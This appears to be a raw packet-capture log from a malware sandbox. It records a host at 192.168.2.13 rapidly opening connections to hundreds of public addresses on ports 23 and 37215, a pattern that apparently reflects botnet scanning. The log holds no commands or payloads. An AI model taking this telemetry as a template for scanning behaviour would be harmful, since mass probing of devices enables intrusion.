                                              Nov 23, 2023 05:14:49.810720921 CET80805420285.7.138.112192.168.2.13
                                              Nov 23, 2023 05:14:49.816220045 CET80805420262.23.248.171192.168.2.13
                                              Nov 23, 2023 05:14:49.821172953 CET80805420295.217.237.206192.168.2.13
                                              Nov 23, 2023 05:14:49.822835922 CET2355738156.194.238.194192.168.2.13
                                              Nov 23, 2023 05:14:49.826630116 CET80805420295.237.77.145192.168.2.13
                                              Nov 23, 2023 05:14:49.827728987 CET80805420285.8.138.215192.168.2.13
                                              Nov 23, 2023 05:14:49.829117060 CET80805420262.77.233.66192.168.2.13
                                              Nov 23, 2023 05:14:49.829889059 CET80805420295.163.180.208192.168.2.13
                                              Nov 23, 2023 05:14:49.832689047 CET80805420295.203.187.10192.168.2.13
                                              Nov 23, 2023 05:14:49.852231979 CET80805420231.200.60.86192.168.2.13
                                              Nov 23, 2023 05:14:49.852430105 CET542028080192.168.2.1331.200.60.86
                                              Nov 23, 2023 05:14:49.853046894 CET80805420262.217.243.189192.168.2.13
                                              Nov 23, 2023 05:14:49.858006954 CET80805420294.121.21.87192.168.2.13
                                              Nov 23, 2023 05:14:49.858068943 CET542028080192.168.2.1394.121.21.87
                                              Nov 23, 2023 05:14:49.875931025 CET80805420231.146.33.66192.168.2.13
                                              Nov 23, 2023 05:14:49.880969048 CET80805420231.163.178.10192.168.2.13
                                              Nov 23, 2023 05:14:49.900995016 CET2355738118.57.221.177192.168.2.13
                                              Nov 23, 2023 05:14:49.924799919 CET2355738116.59.201.44192.168.2.13
                                              Nov 23, 2023 05:14:49.939426899 CET80805420295.198.227.192192.168.2.13
                                              Nov 23, 2023 05:14:49.940972090 CET235573861.65.125.213192.168.2.13
                                              Nov 23, 2023 05:14:49.943470001 CET23557381.82.255.102192.168.2.13
                                              Nov 23, 2023 05:14:50.600698948 CET5573823192.168.2.13195.76.126.32
                                              Nov 23, 2023 05:14:50.600698948 CET5573823192.168.2.1342.65.231.58
                                              Nov 23, 2023 05:14:50.600698948 CET5573823192.168.2.1358.35.122.211
                                              Nov 23, 2023 05:14:50.600702047 CET5573823192.168.2.13253.162.172.82
                                              Nov 23, 2023 05:14:50.600698948 CET5573823192.168.2.13183.213.131.30
                                              Nov 23, 2023 05:14:50.600698948 CET5573823192.168.2.13202.77.83.202
                                              Nov 23, 2023 05:14:50.600698948 CET5573823192.168.2.13251.112.242.158
                                              Nov 23, 2023 05:14:50.600702047 CET5573823192.168.2.1353.188.111.104
                                              Nov 23, 2023 05:14:50.600707054 CET5573823192.168.2.13124.2.102.223
                                              Nov 23, 2023 05:14:50.600706100 CET5573823192.168.2.13116.173.48.106
                                              Nov 23, 2023 05:14:50.600707054 CET5573823192.168.2.13250.202.194.163
                                              Nov 23, 2023 05:14:50.600706100 CET5573823192.168.2.13197.238.42.126
                                              Nov 23, 2023 05:14:50.600708961 CET5573823192.168.2.13105.84.80.148
                                              Nov 23, 2023 05:14:50.600707054 CET5573823192.168.2.1399.114.220.252
                                              Nov 23, 2023 05:14:50.600706100 CET5573823192.168.2.1385.251.95.62
                                              Nov 23, 2023 05:14:50.600707054 CET5573823192.168.2.13118.223.62.77
                                              Nov 23, 2023 05:14:50.600708961 CET5573823192.168.2.1367.209.133.135
                                              Nov 23, 2023 05:14:50.600706100 CET5573823192.168.2.13162.233.201.154
                                              Nov 23, 2023 05:14:50.600749016 CET5573823192.168.2.13255.144.165.136
                                              Nov 23, 2023 05:14:50.600749016 CET5573823192.168.2.13150.98.182.35
                                              Nov 23, 2023 05:14:50.600750923 CET5573823192.168.2.13161.11.194.1
                                              Nov 23, 2023 05:14:50.600752115 CET5573823192.168.2.1379.85.74.0
                                              Nov 23, 2023 05:14:50.600752115 CET5573823192.168.2.13255.164.110.83
                                              Nov 23, 2023 05:14:50.600752115 CET5573823192.168.2.13152.59.101.50
                                              Nov 23, 2023 05:14:50.600750923 CET5573823192.168.2.13161.1.45.236
                                              Nov 23, 2023 05:14:50.600752115 CET5573823192.168.2.13133.32.63.118
                                              Nov 23, 2023 05:14:50.600752115 CET5573823192.168.2.13109.181.93.78
                                              Nov 23, 2023 05:14:50.600755930 CET5573823192.168.2.1386.197.228.148
                                              Nov 23, 2023 05:14:50.600755930 CET5573823192.168.2.1332.177.94.56
                                              Nov 23, 2023 05:14:50.600755930 CET5573823192.168.2.1363.88.33.224
                                              Nov 23, 2023 05:14:50.600755930 CET5573823192.168.2.13119.111.233.231
                                              Nov 23, 2023 05:14:50.600755930 CET5573823192.168.2.1379.241.156.207
                                              Nov 23, 2023 05:14:50.600755930 CET5573823192.168.2.13154.217.192.185
                                              Nov 23, 2023 05:14:50.600766897 CET5573823192.168.2.1341.85.225.189
                                              Nov 23, 2023 05:14:50.600766897 CET5573823192.168.2.1342.241.129.78
                                              Nov 23, 2023 05:14:50.600768089 CET5573823192.168.2.13167.226.37.16
                                              Nov 23, 2023 05:14:50.600766897 CET5573823192.168.2.13250.102.115.164
                                              Nov 23, 2023 05:14:50.600766897 CET5573823192.168.2.13223.22.190.210
                                              Nov 23, 2023 05:14:50.600768089 CET5573823192.168.2.13160.162.31.111
                                              Nov 23, 2023 05:14:50.600766897 CET5573823192.168.2.1368.4.65.208
                                              Nov 23, 2023 05:14:50.600768089 CET5573823192.168.2.1381.236.218.27
                                              Nov 23, 2023 05:14:50.600769997 CET5573823192.168.2.1397.19.68.140
                                              Nov 23, 2023 05:14:50.600768089 CET5573823192.168.2.1343.166.138.236
                                              Nov 23, 2023 05:14:50.600769997 CET5573823192.168.2.1395.122.107.44
                                              Nov 23, 2023 05:14:50.600768089 CET5573823192.168.2.13171.103.254.224
                                              Nov 23, 2023 05:14:50.600768089 CET5573823192.168.2.13202.212.209.92
                                              Nov 23, 2023 05:14:50.600774050 CET5573823192.168.2.13242.126.70.242
                                              Nov 23, 2023 05:14:50.600774050 CET5573823192.168.2.13181.241.31.72
                                              Nov 23, 2023 05:14:50.600774050 CET5573823192.168.2.13190.62.224.250
                                              Nov 23, 2023 05:14:50.600784063 CET5573823192.168.2.13106.243.100.33
                                              Nov 23, 2023 05:14:50.600784063 CET5573823192.168.2.13181.141.70.11
                                              Nov 23, 2023 05:14:50.600784063 CET5573823192.168.2.1369.147.219.42
                                              Nov 23, 2023 05:14:50.600791931 CET5573823192.168.2.1346.181.216.186
                                              Nov 23, 2023 05:14:50.600791931 CET5573823192.168.2.13252.161.189.45
                                              Nov 23, 2023 05:14:50.600791931 CET5573823192.168.2.13246.100.171.227
                                              Nov 23, 2023 05:14:50.600791931 CET5497037215192.168.2.13156.149.80.99
                                              Nov 23, 2023 05:14:50.600791931 CET5497037215192.168.2.13197.68.192.144
                                              Nov 23, 2023 05:14:50.600791931 CET5573823192.168.2.1312.65.127.78
                                              Nov 23, 2023 05:14:50.600801945 CET5573823192.168.2.13162.184.227.196
                                              Nov 23, 2023 05:14:50.600810051 CET5497037215192.168.2.13197.17.46.157
                                              Nov 23, 2023 05:14:50.600816965 CET5573823192.168.2.1338.183.72.89
                                              Nov 23, 2023 05:14:50.600816965 CET5573823192.168.2.13200.135.203.1
                                              Nov 23, 2023 05:14:50.600817919 CET5573823192.168.2.1340.52.16.82
                                              Nov 23, 2023 05:14:50.600825071 CET5573823192.168.2.1319.125.192.205
                                              Nov 23, 2023 05:14:50.600825071 CET5573823192.168.2.1380.242.85.170
                                              Nov 23, 2023 05:14:50.600828886 CET5497037215192.168.2.1341.135.4.27
                                              Nov 23, 2023 05:14:50.600841999 CET5573823192.168.2.1394.197.182.161
                                              Nov 23, 2023 05:14:50.600841999 CET5573823192.168.2.13216.212.152.165
                                              Nov 23, 2023 05:14:50.600847960 CET5573823192.168.2.1334.226.111.124
                                              Nov 23, 2023 05:14:50.600857019 CET5573823192.168.2.13138.8.69.84
                                              Nov 23, 2023 05:14:50.600857973 CET5573823192.168.2.13149.153.242.73
                                              Nov 23, 2023 05:14:50.600864887 CET5573823192.168.2.13240.190.6.165
                                              Nov 23, 2023 05:14:50.600868940 CET5573823192.168.2.13169.225.229.11
                                              Nov 23, 2023 05:14:50.600876093 CET5573823192.168.2.1383.190.142.224
                                              Nov 23, 2023 05:14:50.600883961 CET5573823192.168.2.13207.92.120.239
                                              Nov 23, 2023 05:14:50.600886106 CET5573823192.168.2.13144.53.172.227
                                              Nov 23, 2023 05:14:50.600887060 CET5573823192.168.2.13210.67.250.12
                                              Nov 23, 2023 05:14:50.600899935 CET5573823192.168.2.134.176.174.233
                                              Nov 23, 2023 05:14:50.600899935 CET5573823192.168.2.13223.136.32.89
                                              Nov 23, 2023 05:14:50.600909948 CET5573823192.168.2.13250.123.185.134
                                              Nov 23, 2023 05:14:50.600924969 CET5573823192.168.2.13246.39.122.88
                                              Nov 23, 2023 05:14:50.600928068 CET5573823192.168.2.1366.207.125.221
                                              Nov 23, 2023 05:14:50.600928068 CET5573823192.168.2.13185.102.47.81
                                              Nov 23, 2023 05:14:50.600930929 CET5573823192.168.2.13255.159.58.206
                                              Nov 23, 2023 05:14:50.600934029 CET5497037215192.168.2.1341.8.204.251
                                              Nov 23, 2023 05:14:50.600939989 CET5573823192.168.2.13196.177.242.97
                                              Nov 23, 2023 05:14:50.600958109 CET5573823192.168.2.13220.149.5.142
                                              Nov 23, 2023 05:14:50.600959063 CET5573823192.168.2.13212.193.50.27
                                              Nov 23, 2023 05:14:50.600970984 CET5497037215192.168.2.13156.231.204.0
                                              Nov 23, 2023 05:14:50.600971937 CET5573823192.168.2.13201.62.138.252
                                              Nov 23, 2023 05:14:50.600979090 CET5573823192.168.2.1373.141.227.164
                                              Nov 23, 2023 05:14:50.600981951 CET5573823192.168.2.1374.212.52.79
                                              Nov 23, 2023 05:14:50.600986958 CET5573823192.168.2.13207.86.76.129
                                              Nov 23, 2023 05:14:50.600989103 CET5497037215192.168.2.1341.179.240.224
                                              Nov 23, 2023 05:14:50.600989103 CET5573823192.168.2.13113.20.249.144
                                              Nov 23, 2023 05:14:50.600994110 CET5573823192.168.2.1389.164.177.119
                                              Nov 23, 2023 05:14:50.601006031 CET5573823192.168.2.13100.53.254.69
                                              Nov 23, 2023 05:14:50.601011038 CET5573823192.168.2.13155.99.249.104
                                              Nov 23, 2023 05:14:50.601021051 CET5573823192.168.2.13204.1.159.38
                                              Nov 23, 2023 05:14:50.601026058 CET5573823192.168.2.1344.10.230.45
                                              Nov 23, 2023 05:14:50.601032019 CET5497037215192.168.2.13197.117.13.232
                                              Nov 23, 2023 05:14:50.601032019 CET5573823192.168.2.13160.212.40.147
                                              Nov 23, 2023 05:14:50.601031065 CET5573823192.168.2.13184.181.240.188
                                              Nov 23, 2023 05:14:50.601032972 CET5573823192.168.2.13200.181.104.29
                                              Nov 23, 2023 05:14:50.601052999 CET5573823192.168.2.134.22.133.10
                                              Nov 23, 2023 05:14:50.601052999 CET5573823192.168.2.135.121.142.65
                                              Nov 23, 2023 05:14:50.601064920 CET5573823192.168.2.13254.12.48.240
                                              Nov 23, 2023 05:14:50.601064920 CET5573823192.168.2.13176.47.102.136
                                              Nov 23, 2023 05:14:50.601067066 CET5573823192.168.2.1381.201.135.89
                                              Nov 23, 2023 05:14:50.601075888 CET5497037215192.168.2.13156.185.196.213
                                              Nov 23, 2023 05:14:50.601078987 CET5497037215192.168.2.1341.139.248.54
                                              Nov 23, 2023 05:14:50.601088047 CET5573823192.168.2.1373.150.23.114
                                              Nov 23, 2023 05:14:50.601093054 CET5573823192.168.2.13213.5.171.90
                                              Nov 23, 2023 05:14:50.601095915 CET5573823192.168.2.13164.9.237.40
                                              Nov 23, 2023 05:14:50.601099014 CET5497037215192.168.2.1341.76.147.24
                                              Nov 23, 2023 05:14:50.601099014 CET5573823192.168.2.13105.41.136.132
                                              Nov 23, 2023 05:14:50.601108074 CET5573823192.168.2.1334.164.148.19
                                              Nov 23, 2023 05:14:50.601113081 CET5573823192.168.2.13158.176.80.134
                                              Nov 23, 2023 05:14:50.601114035 CET5497037215192.168.2.13156.213.246.154
                                              Nov 23, 2023 05:14:50.601114035 CET5497037215192.168.2.13156.108.26.149
                                              Nov 23, 2023 05:14:50.601123095 CET5497037215192.168.2.13197.197.242.138
                                              Nov 23, 2023 05:14:50.601140022 CET5573823192.168.2.13183.156.190.234
                                              Nov 23, 2023 05:14:50.601140022 CET5497037215192.168.2.13156.196.53.110
                                              Nov 23, 2023 05:14:50.601140976 CET5573823192.168.2.13220.26.5.96
                                              Nov 23, 2023 05:14:50.601140976 CET5573823192.168.2.13191.148.109.216
                                              Nov 23, 2023 05:14:50.601140976 CET5573823192.168.2.1385.141.91.250
                                              Nov 23, 2023 05:14:50.601144075 CET5497037215192.168.2.13156.61.63.38
                                              Nov 23, 2023 05:14:50.601146936 CET5573823192.168.2.1317.57.159.55
                                              Nov 23, 2023 05:14:50.601151943 CET5497037215192.168.2.1341.130.174.9
                                              Nov 23, 2023 05:14:50.601151943 CET5573823192.168.2.13219.171.37.17
                                              Nov 23, 2023 05:14:50.601151943 CET5497037215192.168.2.13156.139.235.210
                                              Nov 23, 2023 05:14:50.601151943 CET5573823192.168.2.13113.19.96.255
                                              Nov 23, 2023 05:14:50.601155996 CET5573823192.168.2.1331.92.116.173
                                              Nov 23, 2023 05:14:50.601162910 CET5497037215192.168.2.1341.66.46.10
                                              Nov 23, 2023 05:14:50.601165056 CET5573823192.168.2.13223.53.192.63
                                              Nov 23, 2023 05:14:50.601165056 CET5573823192.168.2.1395.123.227.86
                                              Nov 23, 2023 05:14:50.601167917 CET5573823192.168.2.13246.182.123.140
                                              Nov 23, 2023 05:14:50.601170063 CET5573823192.168.2.1376.254.27.128
                                              Nov 23, 2023 05:14:50.601170063 CET5573823192.168.2.1319.48.67.138
                                              Nov 23, 2023 05:14:50.601174116 CET5497037215192.168.2.1341.22.95.83
                                              Nov 23, 2023 05:14:50.601178885 CET5573823192.168.2.1368.128.216.49
                                              Nov 23, 2023 05:14:50.601181984 CET5497037215192.168.2.1341.8.169.138
                                              Nov 23, 2023 05:14:50.601182938 CET5573823192.168.2.13222.127.223.53
                                              Nov 23, 2023 05:14:50.601183891 CET5573823192.168.2.13201.95.233.221
                                              Nov 23, 2023 05:14:50.601178885 CET5497037215192.168.2.13156.77.151.104
                                              Nov 23, 2023 05:14:50.601185083 CET5573823192.168.2.1374.46.140.37
                                              Nov 23, 2023 05:14:50.601185083 CET5497037215192.168.2.13156.124.76.90
                                              Nov 23, 2023 05:14:50.601195097 CET5497037215192.168.2.13156.44.173.0
                                              Nov 23, 2023 05:14:50.601195097 CET5573823192.168.2.13167.119.210.143
                                              Nov 23, 2023 05:14:50.601196051 CET5573823192.168.2.139.172.58.171
                                              Nov 23, 2023 05:14:50.601198912 CET5573823192.168.2.1327.108.153.60
                                              Nov 23, 2023 05:14:50.601203918 CET5573823192.168.2.13121.165.248.68
                                              Nov 23, 2023 05:14:50.601216078 CET5573823192.168.2.13179.245.13.197
                                              Nov 23, 2023 05:14:50.601216078 CET5497037215192.168.2.1341.80.181.51
                                              Nov 23, 2023 05:14:50.601216078 CET5497037215192.168.2.13156.55.161.113
                                              Nov 23, 2023 05:14:50.601216078 CET5497037215192.168.2.13156.127.17.116
                                              Nov 23, 2023 05:14:50.601216078 CET5497037215192.168.2.13156.71.228.119
                                              Nov 23, 2023 05:14:50.601216078 CET5573823192.168.2.13115.183.129.31
                                              Nov 23, 2023 05:14:50.601219893 CET5497037215192.168.2.13156.6.151.188
                                              Nov 23, 2023 05:14:50.601217031 CET5497037215192.168.2.13156.34.215.56
                                              Nov 23, 2023 05:14:50.601219893 CET5497037215192.168.2.1341.79.128.226
                                              Nov 23, 2023 05:14:50.601233006 CET5497037215192.168.2.13156.176.209.163
                                              Nov 23, 2023 05:14:50.601233959 CET5497037215192.168.2.13156.53.81.115
                                              Nov 23, 2023 05:14:50.601234913 CET5497037215192.168.2.1341.232.43.34
                                              Nov 23, 2023 05:14:50.601238012 CET5573823192.168.2.13164.81.246.188
                                              Nov 23, 2023 05:14:50.601238966 CET5573823192.168.2.13112.88.71.56
                                              Nov 23, 2023 05:14:50.601244926 CET5573823192.168.2.1335.115.52.110
                                              Nov 23, 2023 05:14:50.601244926 CET5497037215192.168.2.13156.152.148.119
                                              Nov 23, 2023 05:14:50.601249933 CET5573823192.168.2.13154.171.59.99
                                              Nov 23, 2023 05:14:50.601258993 CET5497037215192.168.2.13197.66.102.183
                                              Nov 23, 2023 05:14:50.601262093 CET5497037215192.168.2.1341.134.71.53
                                              Nov 23, 2023 05:14:50.601277113 CET5573823192.168.2.13159.147.156.30
                                              Nov 23, 2023 05:14:50.601277113 CET5573823192.168.2.13218.224.108.222
                                              Nov 23, 2023 05:14:50.601279974 CET5497037215192.168.2.13197.240.248.74
                                              Nov 23, 2023 05:14:50.601283073 CET5497037215192.168.2.1341.186.189.228
                                              Nov 23, 2023 05:14:50.601285934 CET5573823192.168.2.13113.80.22.213
                                              Nov 23, 2023 05:14:50.601289988 CET5497037215192.168.2.1341.103.161.253
                                              Nov 23, 2023 05:14:50.601289988 CET5497037215192.168.2.13156.48.162.192
                                              Nov 23, 2023 05:14:50.601296902 CET5497037215192.168.2.13197.131.76.21
                                              Nov 23, 2023 05:14:50.601303101 CET5497037215192.168.2.1341.48.141.45
                                              Nov 23, 2023 05:14:50.601305962 CET5573823192.168.2.1394.122.66.197
                                              Nov 23, 2023 05:14:50.601309061 CET5573823192.168.2.13124.221.9.230
                                              Nov 23, 2023 05:14:50.601310968 CET5497037215192.168.2.1341.120.156.173
                                              Nov 23, 2023 05:14:50.601316929 CET5497037215192.168.2.13156.183.183.176
                                              Nov 23, 2023 05:14:50.601316929 CET5573823192.168.2.1339.112.92.207
                                              Nov 23, 2023 05:14:50.601317883 CET5497037215192.168.2.13156.196.238.126
                                              Nov 23, 2023 05:14:50.601317883 CET5497037215192.168.2.13156.110.216.36
                                              Nov 23, 2023 05:14:50.601325989 CET5573823192.168.2.13142.84.22.61
                                              Nov 23, 2023 05:14:50.601330996 CET5573823192.168.2.13202.27.224.156
                                              Nov 23, 2023 05:14:50.601330996 CET5497037215192.168.2.13197.135.146.121
                                              Nov 23, 2023 05:14:50.601330996 CET5497037215192.168.2.1341.207.45.27
                                              Nov 23, 2023 05:14:50.601330996 CET5497037215192.168.2.13156.192.193.129
                                              Nov 23, 2023 05:14:50.601334095 CET5497037215192.168.2.13197.110.132.56
                                              Nov 23, 2023 05:14:50.601334095 CET5497037215192.168.2.13197.179.100.131
                                              Nov 23, 2023 05:14:50.601336956 CET5497037215192.168.2.13197.182.85.219
                                              Nov 23, 2023 05:14:50.601345062 CET5573823192.168.2.13191.89.225.203
                                              Nov 23, 2023 05:14:50.601352930 CET5573823192.168.2.13165.188.117.34
                                              Nov 23, 2023 05:14:50.601360083 CET5497037215192.168.2.13156.230.218.13
                                              Nov 23, 2023 05:14:50.601362944 CET5497037215192.168.2.13197.142.2.136
                                              Nov 23, 2023 05:14:50.601362944 CET5573823192.168.2.13162.135.150.178
                                              Nov 23, 2023 05:14:50.601362944 CET5497037215192.168.2.13156.93.143.217
                                              Nov 23, 2023 05:14:50.601363897 CET5497037215192.168.2.1341.244.196.218
                                              Nov 23, 2023 05:14:50.601363897 CET5497037215192.168.2.13197.165.29.175
                                              Nov 23, 2023 05:14:50.601362944 CET5497037215192.168.2.13197.165.227.4
                                              Nov 23, 2023 05:14:50.601362944 CET5573823192.168.2.13220.4.11.157
                                              Nov 23, 2023 05:14:50.601363897 CET5497037215192.168.2.13156.228.57.108
                                              Nov 23, 2023 05:14:50.601362944 CET5497037215192.168.2.1341.76.75.220
                                              Nov 23, 2023 05:14:50.601362944 CET5497037215192.168.2.13197.60.159.24
                                              Nov 23, 2023 05:14:50.601362944 CET5497037215192.168.2.1341.240.153.182
                                              Nov 23, 2023 05:14:50.601386070 CET5497037215192.168.2.13197.48.159.180
                                              Nov 23, 2023 05:14:50.601386070 CET5497037215192.168.2.1341.255.246.95
                                              Nov 23, 2023 05:14:50.601386070 CET5497037215192.168.2.13156.182.87.56
                                              Nov 23, 2023 05:14:50.601389885 CET5497037215192.168.2.13197.176.249.115
                                              Nov 23, 2023 05:14:50.601389885 CET5497037215192.168.2.13156.61.157.62
                                              Nov 23, 2023 05:14:50.601389885 CET5573823192.168.2.1354.23.6.212
                                              Nov 23, 2023 05:14:50.601389885 CET5497037215192.168.2.13197.28.224.141
                                              Nov 23, 2023 05:14:50.601391077 CET5497037215192.168.2.1341.238.213.92
                                              Nov 23, 2023 05:14:50.601392031 CET5497037215192.168.2.13156.83.0.170
                                              Nov 23, 2023 05:14:50.601391077 CET5497037215192.168.2.1341.242.219.195
                                              Nov 23, 2023 05:14:50.601391077 CET5573823192.168.2.13104.189.88.81
                                              Nov 23, 2023 05:14:50.601393938 CET5497037215192.168.2.1341.234.175.19
                                              Nov 23, 2023 05:14:50.601394892 CET5573823192.168.2.13243.217.23.156
                                              Nov 23, 2023 05:14:50.601392031 CET5497037215192.168.2.13156.238.51.239
                                              Nov 23, 2023 05:14:50.601393938 CET5497037215192.168.2.1341.119.222.26
                                              Nov 23, 2023 05:14:50.601394892 CET5573823192.168.2.1393.33.192.250
                                              Nov 23, 2023 05:14:50.601394892 CET5497037215192.168.2.13197.62.72.85
                                              Nov 23, 2023 05:14:50.601394892 CET5497037215192.168.2.1341.162.28.73
                                              Nov 23, 2023 05:14:50.601394892 CET5573823192.168.2.13158.189.153.13
                                              Nov 23, 2023 05:14:50.601394892 CET5573823192.168.2.1324.93.30.152
                                              Nov 23, 2023 05:14:50.601409912 CET5573823192.168.2.1399.116.239.228
                                              Nov 23, 2023 05:14:50.601409912 CET5573823192.168.2.13204.166.193.161
                                              Nov 23, 2023 05:14:50.601409912 CET5573823192.168.2.13218.17.71.120
                                              Nov 23, 2023 05:14:50.601414919 CET5497037215192.168.2.13156.87.53.186
                                              Nov 23, 2023 05:14:50.601414919 CET5497037215192.168.2.13197.165.223.25
                                              Nov 23, 2023 05:14:50.601416111 CET5573823192.168.2.1383.192.214.210
                                              Nov 23, 2023 05:14:50.601416111 CET5497037215192.168.2.13156.116.78.18
                                              Nov 23, 2023 05:14:50.601416111 CET5573823192.168.2.13157.144.137.85
                                              Nov 23, 2023 05:14:50.601416111 CET5497037215192.168.2.13197.120.166.223
                                              Nov 23, 2023 05:14:50.601417065 CET5497037215192.168.2.13156.76.231.0
                                              Nov 23, 2023 05:14:50.601417065 CET5497037215192.168.2.1341.23.116.201
                                              Nov 23, 2023 05:14:50.601418018 CET5497037215192.168.2.13197.47.6.112
                                              Nov 23, 2023 05:14:50.601417065 CET5573823192.168.2.13253.3.144.178
                                              Nov 23, 2023 05:14:50.601418018 CET5497037215192.168.2.1341.139.237.196
                                              Nov 23, 2023 05:14:50.601417065 CET5573823192.168.2.13135.119.61.212
                                              Nov 23, 2023 05:14:50.601417065 CET5573823192.168.2.13152.220.195.117
                                              Nov 23, 2023 05:14:50.601417065 CET5573823192.168.2.13189.255.223.198
                                              Nov 23, 2023 05:14:50.601425886 CET5497037215192.168.2.13156.114.156.10
                                              Nov 23, 2023 05:14:50.601438999 CET5573823192.168.2.1399.6.237.164
                                              Nov 23, 2023 05:14:50.601438999 CET5497037215192.168.2.1341.173.127.67
                                              Nov 23, 2023 05:14:50.601438999 CET5497037215192.168.2.1341.164.185.29
                                              Nov 23, 2023 05:14:50.601443052 CET5573823192.168.2.13126.107.15.24
                                              Nov 23, 2023 05:14:50.601443052 CET5573823192.168.2.13251.93.53.183
                                              Nov 23, 2023 05:14:50.601443052 CET5497037215192.168.2.13156.1.21.167
                                              Nov 23, 2023 05:14:50.601444006 CET5497037215192.168.2.13197.231.107.72
                                              Nov 23, 2023 05:14:50.601444006 CET5497037215192.168.2.13156.110.17.42
                                              Nov 23, 2023 05:14:50.601449013 CET5497037215192.168.2.13197.251.43.11
                                              Nov 23, 2023 05:14:50.601449013 CET5497037215192.168.2.1341.75.120.128
                                              Nov 23, 2023 05:14:50.601449013 CET5497037215192.168.2.13156.166.10.84
                                              Nov 23, 2023 05:14:50.601449013 CET5573823192.168.2.13204.37.144.154
                                              Nov 23, 2023 05:14:50.601449013 CET5573823192.168.2.13247.151.170.114
                                              Nov 23, 2023 05:14:50.601449013 CET5497037215192.168.2.13197.63.79.185
                                              Nov 23, 2023 05:14:50.601457119 CET5573823192.168.2.13111.64.218.85
                                              Nov 23, 2023 05:14:50.601457119 CET5573823192.168.2.13149.33.150.106
                                              Nov 23, 2023 05:14:50.601457119 CET5497037215192.168.2.13156.157.50.242
                                              Nov 23, 2023 05:14:50.601468086 CET5497037215192.168.2.1341.59.74.116
                                              Nov 23, 2023 05:14:50.601468086 CET5497037215192.168.2.1341.174.209.159
                                              Nov 23, 2023 05:14:50.601468086 CET5497037215192.168.2.13197.111.167.13
                                              Nov 23, 2023 05:14:50.601468086 CET5573823192.168.2.13171.51.18.161
                                              Nov 23, 2023 05:14:50.601468086 CET5497037215192.168.2.13156.95.148.89
                                              Nov 23, 2023 05:14:50.601471901 CET5497037215192.168.2.13197.69.223.128
                                              Nov 23, 2023 05:14:50.601478100 CET5573823192.168.2.13178.124.201.111
                                              Nov 23, 2023 05:14:50.601478100 CET5497037215192.168.2.1341.195.247.31
                                              Nov 23, 2023 05:14:50.601479053 CET5573823192.168.2.1391.136.156.14
                                              Nov 23, 2023 05:14:50.601478100 CET5573823192.168.2.1345.251.215.98
                                              Nov 23, 2023 05:14:50.601479053 CET5573823192.168.2.13196.201.110.84
                                              Nov 23, 2023 05:14:50.601478100 CET5497037215192.168.2.13156.142.235.70
                                              Nov 23, 2023 05:14:50.601479053 CET5573823192.168.2.13202.152.36.0
                                              Nov 23, 2023 05:14:50.601480007 CET5573823192.168.2.13246.171.129.86
                                              Nov 23, 2023 05:14:50.601479053 CET5573823192.168.2.13188.202.208.128
                                              Nov 23, 2023 05:14:50.601480007 CET5573823192.168.2.1391.170.227.180
                                              Nov 23, 2023 05:14:50.601483107 CET5573823192.168.2.13111.244.64.129
                                              Nov 23, 2023 05:14:50.601483107 CET5497037215192.168.2.13197.27.254.83
                                              Nov 23, 2023 05:14:50.601484060 CET5573823192.168.2.13250.251.190.170
                                              Nov 23, 2023 05:14:50.601480007 CET5573823192.168.2.13196.1.226.81
                                              Nov 23, 2023 05:14:50.601486921 CET5497037215192.168.2.13156.113.55.207
                                              Nov 23, 2023 05:14:50.601483107 CET5573823192.168.2.1320.220.200.147
                                              Nov 23, 2023 05:14:50.601483107 CET5573823192.168.2.13142.209.243.248
                                              Nov 23, 2023 05:14:50.601483107 CET5573823192.168.2.1367.152.194.191
                                              Nov 23, 2023 05:14:50.601483107 CET5573823192.168.2.13103.53.67.79
                                              Nov 23, 2023 05:14:50.601483107 CET5573823192.168.2.13107.194.99.20
                                              Nov 23, 2023 05:14:50.601505995 CET5573823192.168.2.139.86.4.32
                                              Nov 23, 2023 05:14:50.601506948 CET5497037215192.168.2.13197.227.97.52
                                              Nov 23, 2023 05:14:50.601506948 CET5497037215192.168.2.13156.153.53.207
                                              Nov 23, 2023 05:14:50.601506948 CET5497037215192.168.2.13197.192.174.79
                                              Nov 23, 2023 05:14:50.601506948 CET5497037215192.168.2.13156.248.91.134
                                              Nov 23, 2023 05:14:50.601506948 CET5497037215192.168.2.13197.177.140.66
                                              Nov 23, 2023 05:14:50.601506948 CET5497037215192.168.2.1341.213.68.44
                                              Nov 23, 2023 05:14:50.601507902 CET5573823192.168.2.131.89.61.27
                                              Nov 23, 2023 05:14:50.601506948 CET5497037215192.168.2.13156.181.144.210
                                              Nov 23, 2023 05:14:50.601510048 CET5497037215192.168.2.13156.98.126.251
                                              Nov 23, 2023 05:14:50.601507902 CET5497037215192.168.2.13197.159.29.138
                                              Nov 23, 2023 05:14:50.601510048 CET5573823192.168.2.13196.37.118.101
                                              Nov 23, 2023 05:14:50.601512909 CET5497037215192.168.2.13197.88.224.4
                                              Nov 23, 2023 05:14:50.601516008 CET5497037215192.168.2.1341.208.105.37
                                              Nov 23, 2023 05:14:50.601516008 CET5497037215192.168.2.13197.169.103.129
                                              Nov 23, 2023 05:14:50.601516008 CET5573823192.168.2.1347.136.225.155
                                              Nov 23, 2023 05:14:50.601525068 CET5573823192.168.2.13120.88.54.1
                                              Nov 23, 2023 05:14:50.601528883 CET5573823192.168.2.13159.205.211.222
                                              Nov 23, 2023 05:14:50.601525068 CET5497037215192.168.2.13156.164.190.56
                                              Nov 23, 2023 05:14:50.601525068 CET5497037215192.168.2.13197.85.249.254
                                              Nov 23, 2023 05:14:50.601525068 CET5497037215192.168.2.13197.95.219.179
                                              Nov 23, 2023 05:14:50.601533890 CET5573823192.168.2.13187.54.153.39
                                              Nov 23, 2023 05:14:50.601533890 CET5497037215192.168.2.1341.190.113.24
                                              Nov 23, 2023 05:14:50.601546049 CET5497037215192.168.2.13197.247.53.175
                                              Nov 23, 2023 05:14:50.601546049 CET5497037215192.168.2.13197.205.23.167
                                              Nov 23, 2023 05:14:50.601552010 CET5573823192.168.2.13217.44.77.131
                                              Nov 23, 2023 05:14:50.601552963 CET5497037215192.168.2.1341.67.177.115
                                              Nov 23, 2023 05:14:50.601552963 CET5497037215192.168.2.13156.24.23.197
                                              Nov 23, 2023 05:14:50.601552963 CET5497037215192.168.2.13197.32.140.172
                                              Nov 23, 2023 05:14:50.601552963 CET5497037215192.168.2.13197.148.98.91
                                              Nov 23, 2023 05:14:50.601553917 CET5573823192.168.2.13203.75.139.63
                                              Nov 23, 2023 05:14:50.601560116 CET5497037215192.168.2.13197.40.186.208
                                              Nov 23, 2023 05:14:50.601567984 CET5497037215192.168.2.13197.44.53.59
                                              Nov 23, 2023 05:14:50.601567984 CET5497037215192.168.2.13156.205.29.207
                                              Nov 23, 2023 05:14:50.601571083 CET5573823192.168.2.1359.215.49.232
